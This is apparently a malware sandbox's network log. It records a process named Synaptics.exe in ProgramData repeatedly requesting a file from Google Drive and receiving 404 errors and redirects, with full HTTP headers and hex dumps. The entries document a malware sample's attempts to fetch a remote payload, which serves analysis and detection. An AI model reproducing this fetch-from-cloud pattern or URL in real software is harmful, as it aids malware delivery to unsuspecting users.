                                                                                                        2024-12-30 10:49:21 UTC1594INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 64 68 71 50 74 35 4a 46 51 4a 70 75 46 4b 64 73 4e 4f 76 56 69 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                                                        Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="dhqPt5JFQJpuFKdsNOvViA">*{margin:0;padding:0}html,code{font:15px/22px arial
                                                                                                        2024-12-30 10:49:21 UTC58INData Raw: 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                        Data Ascii: nd on this server. <ins>Thats all we know.</ins></main>


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        9192.168.2.949789142.250.185.1614431360C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-12-30 10:49:20 UTC186OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                        User-Agent: Synaptics.exe
                                                                                                        Cache-Control: no-cache
                                                                                                        Host: drive.usercontent.google.com
                                                                                                        Connection: Keep-Alive
                                                                                                        2024-12-30 10:49:21 UTC1595INHTTP/1.1 404 Not Found
                                                                                                        X-GUploader-UploadID: AFiumC7GKPgiQtq6bl4V02ugncB5OHfiNo_SoIRf2g1LaneoyB9Hyvx6l3DWdM41o1gzivFG
                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                        Pragma: no-cache
                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                        Date: Mon, 30 Dec 2024 10:49:21 GMT
                                                                                                        P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-wH2-ty5DeJGacJp0u2n8HA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                        Content-Length: 1652
                                                                                                        Server: UploadServer
                                                                                                        Set-Cookie: NID=520=N4o1QVHeRgToqi6PnzM7a9AWDqDNpp5iKvqa-6LRvuOdQrVAYMrf5I2OKNUBbU2VitAEs5OSY2ydQ1MUIvKAcrUbZ8lXCV17u352mktvNEWwdZ6EiHvAKFqf0w6u7mIHAssjMaQVw3jVByZXOTLMR-g-8JMbikLyJt-ATRYZLNBSrxRkcLnB7-Dp; expires=Tue, 01-Jul-2025 10:49:21 GMT; path=/; domain=.google.com; HttpOnly
                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                        Content-Security-Policy: sandbox allow-scripts
                                                                                                        Connection: close
                                                                                                        2024-12-30 10:49:21 UTC1595INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 72 65 31 35 66 49 43 63 42 6d 38 33 64 52 74 39 73 37 33 31 55 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                                                        Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="re15fICcBm83dRt9s731Ug">*{margin:0;padding:0}html,code{font:15px/22px arial
                                                                                                        2024-12-30 10:49:21 UTC57INData Raw: 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                        Data Ascii: d on this server. <ins>Thats all we know.</ins></main>


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        10192.168.2.949798142.250.186.784431360C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-12-30 10:49:21 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                        User-Agent: Synaptics.exe
                                                                                                        Host: docs.google.com
                                                                                                        Cache-Control: no-cache
                                                                                                        2024-12-30 10:49:21 UTC1314INHTTP/1.1 303 See Other
                                                                                                        Content-Type: application/binary
                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                        Pragma: no-cache
                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                        Date: Mon, 30 Dec 2024 10:49:21 GMT
                                                                                                        Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-8_r6WwwEMqy9CPWwRVDl1w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                        Server: ESF
                                                                                                        Content-Length: 0
                                                                                                        X-XSS-Protection: 0
                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                        X-Content-Type-Options: nosniff
                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                        Connection: close


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        11192.168.2.949797142.250.186.784431360C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-12-30 10:49:21 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                        User-Agent: Synaptics.exe
                                                                                                        Host: docs.google.com
                                                                                                        Cache-Control: no-cache
                                                                                                        2024-12-30 10:49:21 UTC1314INHTTP/1.1 303 See Other
                                                                                                        Content-Type: application/binary
                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                        Pragma: no-cache
                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                        Date: Mon, 30 Dec 2024 10:49:21 GMT
                                                                                                        Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-5rJZITn6Hf954UZNplBJYw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                        Server: ESF
                                                                                                        Content-Length: 0
                                                                                                        X-XSS-Protection: 0
                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                        X-Content-Type-Options: nosniff
                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                        Connection: close


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        12192.168.2.949800142.250.185.1614431360C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-12-30 10:49:21 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                        User-Agent: Synaptics.exe
                                                                                                        Cache-Control: no-cache
                                                                                                        Host: drive.usercontent.google.com
                                                                                                        Connection: Keep-Alive
                                                                                                        Cookie: NID=520=PxoMmSRKBx14w5cp_JcSq0hA869335W3PsBTSVHSRRHus_4lEn8VYZRhI8qw0HXdmz9MAFUa6Wm0u02De3CNgJrDYWXVcFCCjCmIU-NVaiNRMmKTXviZEgB2xD6neHjlQqPQlLMvq64K_trRAz5K3GYl8E_46EDUlSvIqztdVSKOr27yXb0zcVU
                                                                                                        2024-12-30 10:49:22 UTC1243INHTTP/1.1 404 Not Found
                                                                                                        X-GUploader-UploadID: AFiumC4MSMcMYdrqW-DJWXb7zMENZlOn0XGfN7zsffyzPOay7_4RNBubjtA92erSHGgpLzwk
                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                        Pragma: no-cache
                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                        Date: Mon, 30 Dec 2024 10:49:22 GMT
                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-0JI98NROO5hh--RgVA3zrQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                        Content-Length: 1652
                                                                                                        Server: UploadServer
                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                        Content-Security-Policy: sandbox allow-scripts
                                                                                                        Connection: close
                                                                                                        2024-12-30 10:49:22 UTC147INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f
                                                                                                        Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                                        2024-12-30 10:49:22 UTC1390INData Raw: 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 31 6a 54 31 43 31 4b 6e 41 79 34 6b 4b 65 72 6e 64 51 64 47 38 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67
                                                                                                        Data Ascii: t Found)!!1</title><style nonce="1jT1C1KnAy4kKerndQdG8A">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                                        2024-12-30 10:49:22 UTC115INData Raw: 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                        Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        13192.168.2.949801142.250.185.1614431360C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-12-30 10:49:21 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                        User-Agent: Synaptics.exe
                                                                                                        Cache-Control: no-cache
                                                                                                        Host: drive.usercontent.google.com
                                                                                                        Connection: Keep-Alive
                                                                                                        Cookie: NID=520=PxoMmSRKBx14w5cp_JcSq0hA869335W3PsBTSVHSRRHus_4lEn8VYZRhI8qw0HXdmz9MAFUa6Wm0u02De3CNgJrDYWXVcFCCjCmIU-NVaiNRMmKTXviZEgB2xD6neHjlQqPQlLMvq64K_trRAz5K3GYl8E_46EDUlSvIqztdVSKOr27yXb0zcVU
                                                                                                        2024-12-30 10:49:22 UTC1243INHTTP/1.1 404 Not Found
                                                                                                        X-GUploader-UploadID: AFiumC4U_peNXljvIHZoDEZg78g6BskECuHi44MXb7gumbvSGFltC4A8fu0vU9LiRklWxVUf
                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                        Pragma: no-cache
                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                        Date: Mon, 30 Dec 2024 10:49:22 GMT
                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-y9_sbqWLfDeDEKMTKrCEyg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                        Content-Length: 1652
                                                                                                        Server: UploadServer
                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                        Content-Security-Policy: sandbox allow-scripts
                                                                                                        Connection: close
                                                                                                        2024-12-30 10:49:22 UTC147INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f
                                                                                                        Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                                        2024-12-30 10:49:22 UTC1390INData Raw: 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 4c 50 4e 53 33 7a 32 4e 74 36 34 53 48 30 4b 50 6c 48 54 4f 70 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67
                                                                                                        Data Ascii: t Found)!!1</title><style nonce="LPNS3z2Nt64SH0KPlHTOpg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                                        2024-12-30 10:49:22 UTC115INData Raw: 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                        Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        14192.168.2.949818142.250.186.784431360C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-12-30 10:49:23 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                        User-Agent: Synaptics.exe
                                                                                                        Host: docs.google.com
                                                                                                        Cache-Control: no-cache
                                                                                                        2024-12-30 10:49:23 UTC1314INHTTP/1.1 303 See Other
                                                                                                        Content-Type: application/binary
                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                        Pragma: no-cache
                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                        Date: Mon, 30 Dec 2024 10:49:23 GMT
                                                                                                        Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-a8sHsQAw8hXtgZZT0Bydsg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                        Server: ESF
                                                                                                        Content-Length: 0
                                                                                                        X-XSS-Protection: 0
                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                        X-Content-Type-Options: nosniff
                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                        Connection: close


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        15192.168.2.949819142.250.186.784431360C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-12-30 10:49:23 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                        User-Agent: Synaptics.exe
                                                                                                        Host: docs.google.com
                                                                                                        Cache-Control: no-cache
                                                                                                        2024-12-30 10:49:23 UTC1314INHTTP/1.1 303 See Other
                                                                                                        Content-Type: application/binary
                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                        Pragma: no-cache
                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                        Date: Mon, 30 Dec 2024 10:49:23 GMT
                                                                                                        Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-drV6XGMV1Jp82X46ZNzVuw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                        Server: ESF
                                                                                                        Content-Length: 0
                                                                                                        X-XSS-Protection: 0
                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                        X-Content-Type-Options: nosniff
                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                        Connection: close


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        16192.168.2.949829142.250.185.1614431360C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-12-30 10:49:24 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                        User-Agent: Synaptics.exe
                                                                                                        Cache-Control: no-cache
                                                                                                        Host: drive.usercontent.google.com
                                                                                                        Connection: Keep-Alive
                                                                                                        Cookie: NID=520=DzX7dWpPgzFIJGfvg8ExuN2uMfaRPG_SwGcGHj08e7zdKKBpeydjRYdTU7Pw_u6pf3u1Bdk_KNnra7AxEZvvcChZB6HGPJvsJYwgunQQpb5mMfvbvIuzv4B9S99kU569f0MaVSlYJvWSVjciHMhvKHZymr9l7G18ZFAVOLb9ajtrLW5ppQvyPm4
                                                                                                        2024-12-30 10:49:24 UTC1243INHTTP/1.1 404 Not Found
                                                                                                        X-GUploader-UploadID: AFiumC6PJaqnq5uz0yQXOF-rbw6RTpyfBrVw1q44YYQz_STxntOTfrPihk1ukhov0zQydG03
                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                        Pragma: no-cache
                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                        Date: Mon, 30 Dec 2024 10:49:24 GMT
                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-1H1iy6TijaKai38xS3og4Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                        Content-Length: 1652
                                                                                                        Server: UploadServer
